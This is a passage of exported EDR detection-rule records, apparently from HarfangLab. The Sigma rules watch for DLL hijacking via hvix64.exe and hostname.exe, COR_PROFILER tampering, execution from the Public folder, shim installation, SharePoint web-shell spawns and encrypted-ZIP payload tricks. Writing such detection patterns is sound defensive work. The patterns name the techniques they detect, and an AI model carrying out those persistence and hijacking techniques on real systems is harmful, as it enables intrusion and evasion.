"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081108Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_hvix64.yml",
"content": "title: DLL Hijacking via hvix64.exe\nid: dd90eaf0-3a7a-41c3-8629-fb73d3ec4ec5\ndescription: |\n Detects potential Windows DLL Hijacking via hvix64.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'hvix64.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\KDSTUB.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "dd90eaf0-3a7a-41c3-8629-fb73d3ec4ec5",
"rule_name": "DLL Hijacking via hvix64.exe",
"rule_description": "Detects potential Windows DLL Hijacking via hvix64.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "dd94655a-da1f-45df-a62f-a450279586eb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.589437Z",
"creation_date": "2026-03-23T11:45:34.589440Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.589448Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_hostname.yml",
"content": "title: DLL Hijacking via Hostname\nid: dd94655a-da1f-45df-a62f-a450279586eb\ndescription: |\n Detects potential Windows DLL Hijacking via hostname.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'hostname.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\mswsock.dll'\n - '\\napinsp.dll'\n - '\\nlansp_c.dll'\n - '\\pnrpnsp.dll'\n - '\\winrnr.dll'\n - '\\wshbth.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "dd94655a-da1f-45df-a62f-a450279586eb",
"rule_name": "DLL Hijacking via Hostname",
"rule_description": "Detects potential Windows DLL Hijacking via hostname.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "dda6c94b-47f4-42fd-bdbd-76095c15ac79",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086046Z",
"creation_date": "2026-03-23T11:45:34.086048Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086052Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://offsec.almond.consulting/UAC-bypass-dotnet.html",
"https://redcanary.com/blog/cor_profiler-for-persistence/",
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md#atomic-test-2---system-scope-cor_profiler",
"https://attack.mitre.org/techniques/T1574/012/"
],
"name": "t1574_012_clr_profiler_system_environment_variable_modification.yml",
"content": "title: .NET CLR Profiler Changed in System Environment\nid: dda6c94b-47f4-42fd-bdbd-76095c15ac79\ndescription: |\n Detects when a COR_PROFILER or a COR_PROFILER_PATH process environment variable is being modified.\n An adversary could set the COR_PROFILER environment variable to a malicious payload to achieve persistence or privilege escalation.\n It is recommended to investigate the value of the registry modification as well as the process performing the modification to determine the legitimacy of this action.\nreferences:\n - https://offsec.almond.consulting/UAC-bypass-dotnet.html\n - https://redcanary.com/blog/cor_profiler-for-persistence/\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md#atomic-test-2---system-scope-cor_profiler\n - https://attack.mitre.org/techniques/T1574/012/\ndate: 2022/12/23\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1574.012\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_set:\n EventType: 'SetValue'\n TargetObject:\n - 'HKLM\\\\*\\Environment\\COR_PROFILER'\n - 'HKLM\\\\*\\Environment\\COR_PROFILER_PATH'\n\n selection_rename:\n EventType: 'RenameKey'\n NewName:\n - 'HKLM\\\\*\\Environment\\COR_PROFILER'\n - 'HKLM\\\\*\\Environment\\COR_PROFILER_PATH'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n exclusion_cybereason:\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Cybereason Inc'\n - 'Cybereason Inc.'\n - 'Cybereason, Inc'\n - 'Cybereason, Inc.'\n\n exclusion_setuphost:\n ProcessImage: '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_systemproperties:\n ProcessImage:\n - '?:\\Windows\\System32\\SystemPropertiesAdvanced.exe'\n - '?:\\Windows\\System32\\SystemPropertiesComputerName.exe'\n - '?:\\Windows\\System32\\SystemPropertiesRemote.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n condition: ((selection_set and not filter_empty) or selection_rename) and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "dda6c94b-47f4-42fd-bdbd-76095c15ac79",
"rule_name": ".NET CLR Profiler Changed in System Environment",
"rule_description": "Detects when a COR_PROFILER or a COR_PROFILER_PATH process environment variable is being modified.\nAn adversary could set the COR_PROFILER environment variable to a malicious payload to achieve persistence or privilege escalation.\nIt is recommended to investigate the value of the registry modification as well as the process performing the modification to determine the legitimacy of this action.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1574.012"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ddfacdc8-9d69-4697-bdc8-98e179789464",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088418Z",
"creation_date": "2026-03-23T11:45:34.088420Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088424Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
"https://attack.mitre.org/techniques/T1036/"
],
"name": "t1036_suspicious_execution_from_user_public.yml",
"content": "title: Suspicious Process Executed from Public User Folder\nid: ddfacdc8-9d69-4697-bdc8-98e179789464\ndescription: |\n Detects a suspicious execution from the root of the Public user folder.\n This folder is an uncommon directory for binaries to execute from and is often abused by attackers.\n It is recommended to investigate the parent and child processes for suspicious activities.\nreferences:\n - https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf\n - https://attack.mitre.org/techniques/T1036/\ndate: 2022/12/14\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image: '?:\\Users\\Public\\\\*.exe'\n\n filter_depth:\n Image: '?:\\Users\\Public\\\\*\\\\*.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ddfacdc8-9d69-4697-bdc8-98e179789464",
"rule_name": "Suspicious Process Executed from Public User Folder",
"rule_description": "Detects a suspicious execution from the root of the Public user folder.\nThis folder is an uncommon directory for binaries to execute from and is often abused by attackers.\nIt is recommended to investigate the parent and child processes for suspicious activities.\n",
"rule_creation_date": "2022-12-14",
"rule_modified_date": "2025-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "de57a975-1542-4602-bd7b-633e461ec1a1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075270Z",
"creation_date": "2026-03-23T11:45:34.075272Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075277Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://strontic.github.io/xcyclopedia/library/sdbinst.exe-9A081E86E9FF0AA957EDA8E8D0624BAC.html",
"https://redcanary.com/blog/detecting-application-shimming/",
"https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html",
"https://blog.f-secure.com/hunting-for-application-shim-databases/",
"https://attack.mitre.org/techniques/T1546/011/"
],
"name": "t1546_011_sdbinst.yml",
"content": "title: Sdbinst.exe Executed\nid: de57a975-1542-4602-bd7b-633e461ec1a1\ndescription: |\n Detects an execution of the legitimate windows binary sdbinst.exe, used to install a new shim database on the system.\n Application shims are used by Microsoft to allow backward compatibility of applications on differing Windows version.\n This feature is often used by attackers in order to establish persistence or to elevate privileges by executing malicious content triggered by application shims.\n It is recommended to investigate the newly installed shim and to look for other suspicious activities by the parent processes.\nreferences:\n - https://strontic.github.io/xcyclopedia/library/sdbinst.exe-9A081E86E9FF0AA957EDA8E8D0624BAC.html\n - https://redcanary.com/blog/detecting-application-shimming/\n - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html\n - https://blog.f-secure.com/hunting-for-application-shim-databases/\n - https://attack.mitre.org/techniques/T1546/011/\ndate: 2021/08/27\nmodified: 2025/04/04\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1546.011\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\sdbinst.exe'\n - OriginalFileName: 'sdbinst.exe'\n selection_command:\n CommandLine|contains: '.sdb'\n\n selection_parent:\n # When the agent is under a lot of pressure, the parent information of a process can be missing.\n # Exceptionnaly for this rule, because it triggers so frequently with a low severity, we will ignore\n # its instances where the parent is missing.\n # When the parent is missing, the ParentImage or ParentCommandLine field is also missing (it is not empty or null)\n # so we can't easily match against that.\n # Instead, we reverse the problem by requiring the ParentImage fields to contain a `\\`.\n ProcessParentImage|contains: '\\'\n\n exclusion_trustedinstaller:\n CommandLine:\n - '?:\\windows\\System32\\sdbinst.exe /c'\n - '?:\\windows\\SysWOW64\\sdbinst.exe /c'\n ParentImage: '?:\\Windows\\servicing\\TrustedInstaller.exe'\n\n exclusion_programfiles:\n CommandLine|startswith:\n - '?:\\Windows\\System32\\sdbinst.exe *:\\Program Files (x86)\\'\n - '?:\\Windows\\SysWOW64\\sdbinst.exe *:\\Program Files (x86)\\'\n - '?:\\Windows\\System32\\sdbinst.exe *:\\Program Files\\'\n - '?:\\Windows\\SysWOW64\\sdbinst.exe *:\\Program Files\\'\n\n exclusion_dbtask:\n CommandLine:\n - '?:\\WINDOWS\\System32\\sdbinst.exe -m -bg'\n - '?:\\WINDOWS\\System32\\sdbinst.exe -mm'\n ProcessParentCommandLine:\n - '?:\\WINDOWS\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc'\n - '?:\\WINDOWS\\system32\\rundll32.exe ?:\\WINDOWS\\system32\\PcaSvc.dll,PcaPatchSdbTask'\n - '?:\\WINDOWS\\System32\\svchost.exe -k LocalSystemNetworkRestricted -p'\n - '?:\\Windows\\System32\\sdbinst.exe -m -bg'\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\sdbinst.exe -mm'\n\n exclusion_ztvoice:\n CommandLine:\n - '?:\\windows\\system32\\sdbinst.exe -q ?:\\windows\\Speech\\Freedom Scientific ZtVoiceEnable Zt.sdb'\n - '?:\\WINDOWS\\system32\\sdbinst.exe -q -u ?:\\WINDOWS\\Speech\\Freedom Scientific ZtVoiceEnable Zt.sdb'\n ParentImage|endswith: '\\msiexec.exe'\n\n exclusion_immersivecontrolpanel:\n CommandLine: '?:\\WINDOWS\\system32\\sdbinst.exe -u ?:\\WINDOWS\\AppPatch\\CustomSDB\\{????????-????-????-????-????????????}.sdb'\n ParentImage: '?:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe'\n\n exclusion_acmigration:\n CommandLine:\n - '?:\\WINDOWS\\system32\\sdbinst.exe -q ?:\\WINDOWS\\Panther\\MigrationShims\\MigShim?\\Migrating\\{????????-????-????-????-????????????}.sdb'\n - '?:\\WINDOWS\\system32\\sdbinst.exe -q -u -g {????????-????-????-????-????????????}'\n ParentCommandLine: 'rundll32.exe acmigration.dll,ApplyMigrationShims'\n\n exclusion_msiexec:\n ParentImage:\n - '?:\\Windows\\SysWOW64\\msiexec.exe'\n - '?:\\Windows\\System32\\msiexec.exe'\n GrandparentImage: '?:\\Windows\\System32\\msiexec.exe'\n\n exclusion_appwiz:\n CommandLine: '?:\\WINDOWS\\system32\\sdbinst.exe -u ?:\\WINDOWS\\AppPatch\\CustomSDB\\{????????-????-????-????-????????????}.sdb'\n ParentCommandLine: '?:\\WINDOWS\\system32\\DllHost.exe /Processid:{FCC74B77-EC3E-4DD8-A80B-008A702075A9}'\n\n exclusion_ztvoiceenable:\n CommandLine:\n - '?:\\Windows\\system32\\sdbinst.exe -q -u ?:\\WINDOWS\\Speech\\ZtVoicesEnable_*.sdb'\n - '?:\\Windows\\SysWOW64\\sdbinst.exe -q -u ?:\\WINDOWS\\Speech\\ZtVoicesEnable_*.sdb'\n\n exclusion_compatibility_toolkit:\n ProcessParentImage:\n - '?:\\Program Files (x86)\\Windows Kits\\10\\Assessment and Deployment Kit\\Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe'\n - '?:\\Program Files (x86)\\Windows Kits\\10\\Assessment and Deployment Kit\\Application Compatibility Toolkit\\Compatibility Administrator (64-bit)\\Compatadmin.exe'\n\n exclusion_compatibility_assistant:\n ParentCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc'\n\n exclusion_testxpert:\n # Generic InstallShield\n ParentImage: '?:\\Users\\\\*\\AppData\\Local\\Temp\\is-*\\setup.tmp'\n ProcessParentProduct: 'testXpert III'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "de57a975-1542-4602-bd7b-633e461ec1a1",
"rule_name": "Sdbinst.exe Executed",
"rule_description": "Detects an execution of the legitimate windows binary sdbinst.exe, used to install a new shim database on the system.\nApplication shims are used by Microsoft to allow backward compatibility of applications on differing Windows version.\nThis feature is often used by attackers in order to establish persistence or to elevate privileges by executing malicious content triggered by application shims.\nIt is recommended to investigate the newly installed shim and to look for other suspicious activities by the parent processes.\n",
"rule_creation_date": "2021-08-27",
"rule_modified_date": "2025-04-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1546.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "de5faf6e-5ae5-4a39-919d-4118f7c7bc95",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086668Z",
"creation_date": "2026-03-23T11:45:34.086670Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086674Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/threat-detection/detecting-sharepoint-attacks-via-worker-process-activity/",
"https://attack.mitre.org/techniques/T1505/003/"
],
"name": "t1505_003_webshell_sharepoint.yml",
"content": "title: Suspicious Process Spawned by Microsoft Sharepoint Web Server\nid: de5faf6e-5ae5-4a39-919d-4118f7c7bc95\ndescription: |\n Detects a suspicious process being spawned by a Microsoft Sharepoint Web Server.\n Attackers may abuse vulnerabilities present in MS Sharepoint to execute malicious code.\n Is is recommended to analyze this process' command-line to determine its legitimacy in the context of the web application.\nreferences:\n - https://redcanary.com/blog/threat-detection/detecting-sharepoint-attacks-via-worker-process-activity/\n - https://attack.mitre.org/techniques/T1505/003/\ndate: 2025/02/18\nmodified: 2025/03/10\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1505.003\n - attack.t1190\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.RemoteShell\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ProcessParentCommandLine|contains: 'sharepoint'\n ProcessParentName: 'w3wp.exe'\n\n filter_w3wp:\n ProcessImage: '?:\\Windows\\System32\\inetsrv\\w3wp.exe'\n\n filter_wer:\n ProcessImage:\n - '?:\\Windows\\system32\\wermgr.exe'\n - '?:\\Windows\\System32\\WerFault.exe'\n\n filter_dotnet_compiler:\n ProcessImage:\n - '?:\\Windows\\Microsoft.NET\\Framework64\\\\*\\csc.exe'\n - '?:\\Windows\\Microsoft.NET\\Framework64\\\\*\\vbc.exe'\n\n filter_regiis:\n ProcessImage: '?:\\Windows\\Microsoft.NET\\Framework64\\\\*\\aspnet_regiis.exe'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "de5faf6e-5ae5-4a39-919d-4118f7c7bc95",
"rule_name": "Suspicious Process Spawned by Microsoft Sharepoint Web Server",
"rule_description": "Detects a suspicious process being spawned by a Microsoft Sharepoint Web Server.\nAttackers may abuse vulnerabilities present in MS Sharepoint to execute malicious code.\nIs is recommended to analyze this process' command-line to determine its legitimacy in the context of the web application.\n",
"rule_creation_date": "2025-02-18",
"rule_modified_date": "2025-03-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1190",
"attack.t1505.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "deb633a1-236a-4d87-a05c-90300c190b66",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070806Z",
"creation_date": "2026-03-23T11:45:34.070808Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070812Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/Tylous/ZipExec",
"https://attack.mitre.org/techniques/T1027/009/"
],
"name": "t1027_009_suspicious_process_decompressing_encrypted_zip.yml",
"content": "title: Encrypted ZIP File Suspiciously Decompressed\nid: deb633a1-236a-4d87-a05c-90300c190b66\ndescription: |\n Detects a suspicious process decompressing an encrypted ZIP file using cmdkey.\n Attackers can use this technique to execute malicious payload and evade detection suing encryption.\n This technique is used in the ZipExec tool that provides a simple way to craft these payloads.\n It is recommended to investigate the content of the ZIP archive and the process that downloaded it.\nreferences:\n - https://github.com/Tylous/ZipExec\n - https://attack.mitre.org/techniques/T1027/009/\ndate: 2022/12/15\nmodified: 2025/01/27\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1027.009\n - attack.execution\n - attack.t1059\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'cmdkey.exe'\n CommandLine|contains|all:\n - 'Microsoft_Windows_Shell_ZipFolder'\n - 'filename='\n - '?pass:'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "deb633a1-236a-4d87-a05c-90300c190b66",
"rule_name": "Encrypted ZIP File Suspiciously Decompressed",
"rule_description": "Detects a suspicious process decompressing an encrypted ZIP file using cmdkey.\nAttackers can use this technique to execute malicious payload and evade detection suing encryption.\nThis technique is used in the ZipExec tool that provides a simple way to craft these payloads.\nIt is recommended to investigate the content of the ZIP archive and the process that downloaded it.\n",
"rule_creation_date": "2022-12-15",
"rule_modified_date": "2025-01-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1027.009",
"attack.t1059"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "defc0f54-4516-4f30-b2ee-0ac0e8d9ddde",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
